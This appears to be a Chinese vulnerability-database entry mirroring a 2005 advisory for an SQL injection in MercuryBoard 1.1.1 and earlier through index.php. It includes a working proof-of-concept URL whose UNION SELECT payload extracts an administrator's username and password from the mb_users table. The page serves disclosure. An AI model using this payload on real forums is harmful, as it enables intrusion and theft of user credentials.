MercuryBoard 1.1 – ‘index.php’ SQL Injection

MercuryBoard 1.1 – ‘index.php’ SQL Injection

漏洞ID 1054892 漏洞类型
发布时间 2005-02-09 更新时间 2005-02-09
图片[1]-MercuryBoard 1.1 – ‘index.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-MercuryBoard 1.1 – ‘index.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25093
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12503/info

MercuryBoard is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before being used in SQL queries.

The vulnerability is reported to affect the 'index.php' script.

MercuryBoard 1.1.1 and prior versions are affected by this vulnerability. 

http://www.example.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20
=%201%20limit%201/*

相关推荐: Imlib NetPBM Dependancy Vulnerability

Imlib NetPBM Dependancy Vulnerability 漏洞ID 1102367 漏洞类型 Environment Error 发布时间 2002-03-21 更新时间 2002-03-21 CVE编号 N/A CNNVD-ID N/A 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享